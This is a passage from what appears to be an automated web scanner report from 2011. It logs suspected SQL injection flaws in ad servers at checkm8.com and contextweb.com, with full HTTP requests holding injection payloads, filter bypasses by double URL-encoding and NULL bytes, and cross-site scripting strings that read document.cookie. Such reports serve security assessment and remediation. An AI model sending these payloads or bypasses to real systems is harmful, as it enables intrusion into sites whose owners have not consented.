GET /adam/detected?cat=Philly.Home&page=343175042346861&serial=1000:1:A&&LOC=http://www.philly.com/s\qaction=reg\arequested=y\arurl=http\p3A\p2F\p2Fwww.philly.com\p2Fphilly\p2Fnews\p2Fnation_world\p2F121548659.html\p3Fef135\p27\p3Balert\p28document.cookie\p29\p2F\p2F4b169261d24\p3D1&WIDTH=86545239817%20or%201%3d2--%20&HEIGHT=912&WIDTH_RANGE=WR_C&DATE=01110510&HOUR=09&RES=RS21&ORD=1920249378467529&req=fr&&Site_Width=940&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: q1.checkm8.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: cm8dccp=1305037224

Response 2

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 14:22:48 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: dt=95,20110510142248,OS=WIN7&JE=1&UL=en&RES=RS21&CE=1305037224;Path=/;Expires=Sun, 17-Jan-2038 23:27:27 GMT;
Set-cookie: A=dYZLW3wJ6HYKwq9P705ba;Path=/;
Set-cookie: C=oYZLW3wmSVMSdaaba7WL19Hb;Path=/;Expires=Mon, 24-Sep-2074 17:56:08 GMT;
x-internal-browser: FF40
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-FROZEN-COOKIES-DETECTION
x-internal-id: 196235096/1270055465/1946258675/3304200488
x-internal-selected:
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 26

...(function(){

})();

1.15. http://q1.checkm8.com/adam/detected [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/detected

Issue detail

The cat parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the cat parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=Philly.Home'%20and%201%3d1--%20&page=343175042346861&serial=1000:1:A&&LOC=http://www.philly.com/s\qaction=reg\arequested=y\arurl=http\p3A\p2F\p2Fwww.philly.com\p2Fphilly\p2Fnews\p2Fnation_world\p2F121548659.html\p3Fef135\p27\p3Balert\p28document.cookie\p29\p2F\p2F4b169261d24\p3D1&WIDTH=865&HEIGHT=912&WIDTH_RANGE=WR_C&DATE=01110510&HOUR=09&RES=RS21&ORD=1920249378467529&req=fr&&Site_Width=940&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: q1.checkm8.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: cm8dccp=1305037224

Response 1

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 14:22:46 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.24 ny-ad14
Set-cookie: dt=95,20110510142246,OS=WIN7&JE=1&UL=en&RES=RS21&CE=1305037224;Path=/;Expires=Sun, 17-Jan-2038 23:27:27 GMT;
Set-cookie: A=dWZLW3w8K72Qxi20LLXba;Path=/;
Set-cookie: C=oWZLW3wW5PRYeaaba1Q9T9Kc;Path=/;Expires=Mon, 24-Sep-2074 17:56:06 GMT;
Set-cookie: O=eWZLW3wfgMMSgGMBnUOka;Path=/;Expires=Mon, 24-Sep-2074 17:56:06 GMT;
x-internal-browser: FF40
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 264862870/1338682980/3892610037/2817138338
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 3

...

Request 2

GET /adam/detected?cat=Philly.Home'%20and%201%3d2--%20&page=343175042346861&serial=1000:1:A&&LOC=http://www.philly.com/s\qaction=reg\arequested=y\arurl=http\p3A\p2F\p2Fwww.philly.com\p2Fphilly\p2Fnews\p2Fnation_world\p2F121548659.html\p3Fef135\p27\p3Balert\p28document.cookie\p29\p2F\p2F4b169261d24\p3D1&WIDTH=865&HEIGHT=912&WIDTH_RANGE=WR_C&DATE=01110510&HOUR=09&RES=RS21&ORD=1920249378467529&req=fr&&Site_Width=940&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: q1.checkm8.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: cm8dccp=1305037224

Response 2

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 14:22:46 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: dt=95,20110510142246,OS=WIN7&JE=1&UL=en&RES=RS21&CE=1305037224;Path=/;Expires=Sun, 17-Jan-2038 23:27:27 GMT;
Set-cookie: A=dWZLW3wJ6HYKwuFV9NKba;Path=/;
Set-cookie: C=oWZLW3wmSVMSdaabaXO37PHc;Path=/;Expires=Mon, 24-Sep-2074 17:56:06 GMT;
x-internal-browser: FF40
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-FROZEN-COOKIES-DETECTION
x-internal-id: 196235096/1270055465/3684716779/2077893440
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 3

...

1.16. http://q1.checkm8.com/adam/detected [req parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/detected

Issue detail

The req parameter appears to be vulnerable to SQL injection attacks. The payloads 13762249'%20or%201%3d1--%20 and 13762249'%20or%201%3d2--%20 were each submitted in the req parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=Philly.Home&page=343175042346861&serial=1000:1:A&&LOC=http://www.philly.com/s\qaction=reg\arequested=y\arurl=http\p3A\p2F\p2Fwww.philly.com\p2Fphilly\p2Fnews\p2Fnation_world\p2F121548659.html\p3Fef135\p27\p3Balert\p28document.cookie\p29\p2F\p2F4b169261d24\p3D1&WIDTH=865&HEIGHT=912&WIDTH_RANGE=WR_C&DATE=01110510&HOUR=09&RES=RS21&ORD=1920249378467529&req=fr13762249'%20or%201%3d1--%20&&Site_Width=940&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: q1.checkm8.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: cm8dccp=1305037224

Response 1

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 14:22:52 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.18 NY-AD8
Set-cookie: dt=95,20110510142252,OS=WIN7&JE=1&UL=en&RES=RS21&CE=1305037224;Path=/;Expires=Sun, 17-Jan-2038 23:27:27 GMT;
Set-cookie: A=d2ZLW3wt9JXIwQPYZNza;Path=/;
Set-cookie: C=o2ZLW3w6RXLQdaabap02MJKb;Path=/;Expires=Mon, 24-Sep-2074 17:56:12 GMT;
Set-cookie: O=e2ZLW3wfgMMSgGMBnUOka;Path=/;Expires=Mon, 24-Sep-2074 17:56:12 GMT;
x-internal-browser: FF40
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 192485258/1266305813/2069149637/1447462706
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 26

...(function(){

})();

Request 2

GET /adam/detected?cat=Philly.Home&page=343175042346861&serial=1000:1:A&&LOC=http://www.philly.com/s\qaction=reg\arequested=y\arurl=http\p3A\p2F\p2Fwww.philly.com\p2Fphilly\p2Fnews\p2Fnation_world\p2F121548659.html\p3Fef135\p27\p3Balert\p28document.cookie\p29\p2F\p2F4b169261d24\p3D1&WIDTH=865&HEIGHT=912&WIDTH_RANGE=WR_C&DATE=01110510&HOUR=09&RES=RS21&ORD=1920249378467529&req=fr13762249'%20or%201%3d2--%20&&Site_Width=940&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: q1.checkm8.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: cm8dccp=1305037224

Response 2

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 14:22:53 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: dt=95,20110510142253,OS=WIN7&JE=1&UL=en&RES=RS21&CE=1305037224;Path=/;Expires=Sun, 17-Jan-2038 23:27:27 GMT;
Set-cookie: A=d3ZLW3wJ6HYKwv6L2N2ba;Path=/;
Set-cookie: C=o3ZLW3wmSVMSdaabaUWLKPHb;Path=/;Expires=Mon, 24-Sep-2074 17:56:13 GMT;
x-internal-browser: FF40
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-FROZEN-COOKIES-DETECTION
x-internal-id: 196235096/1270055465/1908304928/3108108257
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 26

...(function(){

})();

1.17. http://tag.contextweb.com/TagPublish/getad.aspx [tl parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The tl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tl parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the tl request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90495&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.gather.com%2F6360d%253Cimg%2Bsrc%3Da%2Bonerror%3Dalert%281%29%253E1b6979d15ce&mrnd=21675705&if=0&tl=1%2527&pxy=169,100&cxy=1066,267&dxy=1066,267&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cr=2|1|-8588966416881931568|1; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; FC1-WC=^53620_1_2TBaI; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.0; V=wOebwAz4UvVv; 530930_3_90494=1305036044955; 530930_4_90495=1305036425755; vf=5

Response 1

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP202
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 1183
Date: Tue, 10 May 2011 14:13:13 GMT
Connection: close

var strCreative=''
+ '<img src=http://media.contextweb.com/creatives/defaults/300x250.gif height=250 border=0 width=300 alt="There is an error in the ad tag code."><!--ERROR_TAG(id=cw-app202_nYoliQQC
...[SNIP]...

Request 2

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90495&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.gather.com%2F6360d%253Cimg%2Bsrc%3Da%2Bonerror%3Dalert%281%29%253E1b6979d15ce&mrnd=21675705&if=0&tl=1%2527%2527&pxy=169,100&cxy=1066,267&dxy=1066,267&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cr=2|1|-8588966416881931568|1; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; FC1-WC=^53620_1_2TBaI; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.0; V=wOebwAz4UvVv; 530930_3_90494=1305036044955; 530930_4_90495=1305036425755; vf=5

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1412
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 10 May 2011 14:13:13 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv; domain=.contextweb.com; expires=Thu, 10-May-2012 14:13:14 GMT; path=/
Set-Cookie: 530930_4_90495=1305036794140; domain=.contextweb.com; path=/
Set-Cookie: vf=6; domain=.contextweb.com; expires=Wed, 11-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<IFRAME HEIGHT="90" WIDTH="728" SRC="http://media.contextweb.com/creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html" VISIBLE="true" MARGINWIDTH
...[SNIP]...

1.18. http://tag.contextweb.com/TagPublish/getad.aspx [tl parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The tl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tl parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90494&cf=300X250&cn=1&rq=1&dw=865&cwu=http%3A%2F%2Fwww.gather.com%2F6360d%253Cimg%2Bsrc%3Da%2Bonerror%3Dalert%281%29%253E1b6979d15ce&mrnd=42339118&if=0&tl=1'&pxy=670,265&cxy=865,527&dxy=865,527&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
Cookie: C2W4=3D-75AN8VZnYq06_wZQiWy50NyrW9adj8DvHdR7ctR5Ho-CybrZh3NQ; V=RiC6i2pCL3Ub; FC1-WC=^54012_1_2R5ws; FC1-WCR=^108044_1_2R5ws; CDSActionTracking6=gDLdEnJ4dUI3|RiC6i2pCL3Ub|503597|2587|5273|54012|108044|94417|3|0|0|maysville-online.com|2|8|1|0|2|1|2||1|0|PEiOeaHGRLH4quYZj5mgESimscR103Gq|I|2QJ2U|31Blm; pb_rtb_ev=1:535039.5202f94d-e42f-420e-8fc6-233eeae015a9.0|531399.1xcfgwn0ixqhg.0; cw=cw

Response 1

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP202
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 1183
Date: Tue, 10 May 2011 14:10:58 GMT
Connection: close

var strCreative=''
+ '<img src=http://media.contextweb.com/creatives/defaults/300x250.gif height=250 border=0 width=300 alt="There is an error in the ad tag code."><!--ERROR_TAG(id=cw-app202_MK5ySffp
...[SNIP]...

Request 2

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90494&cf=300X250&cn=1&rq=1&dw=865&cwu=http%3A%2F%2Fwww.gather.com%2F6360d%253Cimg%2Bsrc%3Da%2Bonerror%3Dalert%281%29%253E1b6979d15ce&mrnd=42339118&if=0&tl=1''&pxy=670,265&cxy=865,527&dxy=865,527&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
Cookie: C2W4=3D-75AN8VZnYq06_wZQiWy50NyrW9adj8DvHdR7ctR5Ho-CybrZh3NQ; V=RiC6i2pCL3Ub; FC1-WC=^54012_1_2R5ws; FC1-WCR=^108044_1_2R5ws; CDSActionTracking6=gDLdEnJ4dUI3|RiC6i2pCL3Ub|503597|2587|5273|54012|108044|94417|3|0|0|maysville-online.com|2|8|1|0|2|1|2||1|0|PEiOeaHGRLH4quYZj5mgESimscR103Gq|I|2QJ2U|31Blm; pb_rtb_ev=1:535039.5202f94d-e42f-420e-8fc6-233eeae015a9.0|531399.1xcfgwn0ixqhg.0; cw=cw

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2548
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 10 May 2011 14:10:58 GMT
Connection: close
Set-Cookie: V=RiC6i2pCL3Ub; domain=.contextweb.com; expires=Thu, 10-May-2012 14:10:58 GMT; path=/
Set-Cookie: 530930_3_90494=1305036658918; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Wed, 11-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script language="JavaScript">\n'
+ 'var zflag_nid="1432"; var zflag_cid="1"; var zflag_sid="1"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9";\n'
+ '</scr
...[SNIP]...

1.19. http://tag.contextweb.com/TagPublish/getad.aspx [tz parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The tz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90495&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.gather.com%2Flogin.action%3FbeamBack%3D%252FviewTag.action&mrnd=13017817&if=0&tl=1&pxy=169,100&cxy=1066,267&dxy=1066,267&tz=300%00'&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/login.action?beamBack=%2FviewTag.action
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cr=2|1|-8588966416881931568|1; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; FC1-WC=^53620_1_2TBaI; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.0; V=wOebwAz4UvVv; 530930_3_90494=1305036044955; vf=4

Response 1

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP202
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 1183
Date: Tue, 10 May 2011 14:09:40 GMT
Connection: close

var strCreative=''
+ '<img src=http://media.contextweb.com/creatives/defaults/300x250.gif height=250 border=0 width=300 alt="There is an error in the ad tag code."><!--ERROR_TAG(id=cw-app202_LOD8qZmJ
...[SNIP]...

Request 2

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90495&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.gather.com%2Flogin.action%3FbeamBack%3D%252FviewTag.action&mrnd=13017817&if=0&tl=1&pxy=169,100&cxy=1066,267&dxy=1066,267&tz=300%00''&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/login.action?beamBack=%2FviewTag.action
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cr=2|1|-8588966416881931568|1; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; FC1-WC=^53620_1_2TBaI; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.0; V=wOebwAz4UvVv; 530930_3_90494=1305036044955; vf=4

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
